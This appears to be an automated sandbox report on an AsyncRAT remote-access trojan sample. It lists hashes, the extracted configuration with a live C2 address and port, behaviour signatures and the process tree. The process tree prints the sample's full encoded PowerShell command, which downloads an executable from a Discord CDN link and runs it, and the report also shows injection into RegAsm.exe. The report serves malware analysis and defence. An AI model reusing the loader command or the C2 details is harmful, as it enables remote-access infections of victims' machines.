asyncrat | 599e17a85afe5abfc5e7f0210a5d76241bc5304d4ff1fd6f5376bd2aa859a3c6

General

Target

599e17a85afe5abfc5e7f0210a5d76241bc5304d4ff1fd6f5376bd2aa859a3c6.exe
Size

6KB
MD5

224ad38879a55ecc379737225d02b85c
SHA1

260cfe1499c16b381698a462f0997b105add2e9d
SHA256

599e17a85afe5abfc5e7f0210a5d76241bc5304d4ff1fd6f5376bd2aa859a3c6
SHA512

fd781fee26055eeb4eed26058146a5423684543099313c8d6f6c4f157e6484c89cc2d7180f5b82555ce5eb194e595bbb5ce4da8f3e0eba7b1bca27a2a66ce335
SSDEEP

96:I8J79BlBCF5NTcofNVIIKtgNtUqpkK77mc359ed3ojXrl:z9BuFDNNVI5ONtUqpkK77Rzeda

Score

10^/10

asyncrat defendersmartscren rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

DefenderSmartScren

C2

217.64.31.3:8437

Mutex

DefenderSmartScren

Attributes

delay
3
install
false
install_file
SecurityHealtheurvice.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/4620-148-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

38 3436 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

asdsadsadsa.exe

pid process

3256 asdsadsadsa.exe

flow	pid	process
38	3436	powershell.exe

pid	process
3256	asdsadsadsa.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

599e17a85afe5abfc5e7f0210a5d76241bc5304d4ff1fd6f5376bd2aa859a3c6.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	599e17a85afe5abfc5e7f0210a5d76241bc5304d4ff1fd6f5376bd2aa859a3c6.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

asdsadsadsa.exe

description pid process target process

PID 3256 set thread context of 4620 3256 asdsadsadsa.exe RegAsm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

3436 powershell.exe
3436 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exeasdsadsadsa.exe

description pid process

Token: SeDebugPrivilege 3436 powershell.exe
Token: SeDebugPrivilege 3256 asdsadsadsa.exe

description	pid	process	target process
PID 3256 set thread context of 4620	3256	asdsadsadsa.exe	RegAsm.exe

pid	process
3436	powershell.exe
3436	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3436	powershell.exe
Token: SeDebugPrivilege	3256	asdsadsadsa.exe

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

599e17a85afe5abfc5e7f0210a5d76241bc5304d4ff1fd6f5376bd2aa859a3c6.exepowershell.exeasdsadsadsa.exe

description	pid	process	target process
PID 2168 wrote to memory of 3436	2168	599e17a85afe5abfc5e7f0210a5d76241bc5304d4ff1fd6f5376bd2aa859a3c6.exe	powershell.exe
PID 2168 wrote to memory of 3436	2168	599e17a85afe5abfc5e7f0210a5d76241bc5304d4ff1fd6f5376bd2aa859a3c6.exe	powershell.exe
PID 3436 wrote to memory of 3256	3436	powershell.exe	asdsadsadsa.exe
PID 3436 wrote to memory of 3256	3436	powershell.exe	asdsadsadsa.exe
PID 3436 wrote to memory of 3256	3436	powershell.exe	asdsadsadsa.exe
PID 3256 wrote to memory of 4620	3256	asdsadsadsa.exe	RegAsm.exe
PID 3256 wrote to memory of 4620	3256	asdsadsadsa.exe	RegAsm.exe
PID 3256 wrote to memory of 4620	3256	asdsadsadsa.exe	RegAsm.exe
PID 3256 wrote to memory of 4620	3256	asdsadsadsa.exe	RegAsm.exe
PID 3256 wrote to memory of 4620	3256	asdsadsadsa.exe	RegAsm.exe
PID 3256 wrote to memory of 4620	3256	asdsadsadsa.exe	RegAsm.exe
PID 3256 wrote to memory of 4620	3256	asdsadsadsa.exe	RegAsm.exe
PID 3256 wrote to memory of 4620	3256	asdsadsadsa.exe	RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\599e17a85afe5abfc5e7f0210a5d76241bc5304d4ff1fd6f5376bd2aa859a3c6.exe
"C:\Users\Admin\AppData\Local\Temp\599e17a85afe5abfc5e7f0210a5d76241bc5304d4ff1fd6f5376bd2aa859a3c6.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2168

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAbgBpACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAAyADQANwA3ADQAMQA3ADYANgA4ADgAMAA4ADcAOAA1AC8AMQAwADQAMgA0ADcANwA1ADQANAAwADgAOQAzADIANQA2ADUAOQAvAGwAYwBvAG0AcABsAGMAbQBwAG8ALgBlAHgAZQAnACwAIAA8ACMAZgBwAHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAGIAawAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBnAHoAYQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBhAHMAZABzAGEAZABzAGEAZABzAGEALgBlAHgAZQAnACkAKQA8ACMAZwBsAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcwBmAHQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGcAagBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAcwBkAHMAYQBkAHMAYQBkAHMAYQAuAGUAeABlACcAKQA8ACMAcgBjAGsAIwA+AA=="
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3436

C:\Users\Admin\AppData\Roaming\asdsadsadsa.exe
"C:\Users\Admin\AppData\Roaming\asdsadsadsa.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3256

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:4620

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\asdsadsadsa.exe
Filesize
14.7MB

MD5
6f6b812c166e53dc9b52b9b60e5ed369

SHA1
e60cf5e718c030182dec6f7fbbbbf884fcdfcca1

SHA256
ffead35df6bc101476d76393619fe0a06a57d93927417d9bcf814d2e4c6b36a0

SHA512
8e8e5fe21f4b08a053255beb0f4e55f03e0114e7fa2117b8ef8320e7fd88275771394cd9a7e4237793b370f980ff7ed45a6ff78d3d97d59cd077868e7602f4b9

Download Submit
C:\Users\Admin\AppData\Roaming\asdsadsadsa.exe
Filesize
14.7MB

MD5
6f6b812c166e53dc9b52b9b60e5ed369

SHA1
e60cf5e718c030182dec6f7fbbbbf884fcdfcca1

SHA256
ffead35df6bc101476d76393619fe0a06a57d93927417d9bcf814d2e4c6b36a0

SHA512
8e8e5fe21f4b08a053255beb0f4e55f03e0114e7fa2117b8ef8320e7fd88275771394cd9a7e4237793b370f980ff7ed45a6ff78d3d97d59cd077868e7602f4b9

Download Submit
memory/2168-137-0x00007FFA943A0000-0x00007FFA94E61000-memory.dmp

Filesize
10.8MB

Download
memory/2168-132-0x0000000000D60000-0x0000000000D68000-memory.dmp

Filesize
32KB

Download
memory/2168-134-0x00007FFA943A0000-0x00007FFA94E61000-memory.dmp

Filesize
10.8MB

Download
memory/3256-144-0x0000000007840000-0x0000000007DE4000-memory.dmp

Filesize
5.6MB

Download
memory/3256-139-0x0000000000000000-mapping.dmp

Download
memory/3256-143-0x0000000000C70000-0x0000000001B22000-memory.dmp

Filesize
14.7MB

Download
memory/3256-145-0x0000000006E00000-0x0000000006E92000-memory.dmp

Filesize
584KB

Download
memory/3256-146-0x0000000006F50000-0x0000000006FEC000-memory.dmp

Filesize
624KB

Download
memory/3436-138-0x00007FFA943A0000-0x00007FFA94E61000-memory.dmp

Filesize
10.8MB

Download
memory/3436-136-0x00007FFA943A0000-0x00007FFA94E61000-memory.dmp

Filesize
10.8MB

Download
memory/3436-141-0x00007FFA943A0000-0x00007FFA94E61000-memory.dmp

Filesize
10.8MB

Download
memory/3436-135-0x00000157722B0000-0x00000157722D2000-memory.dmp

Filesize
136KB

Download
memory/3436-133-0x0000000000000000-mapping.dmp

Download
memory/4620-147-0x0000000000000000-mapping.dmp

Download
memory/4620-148-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads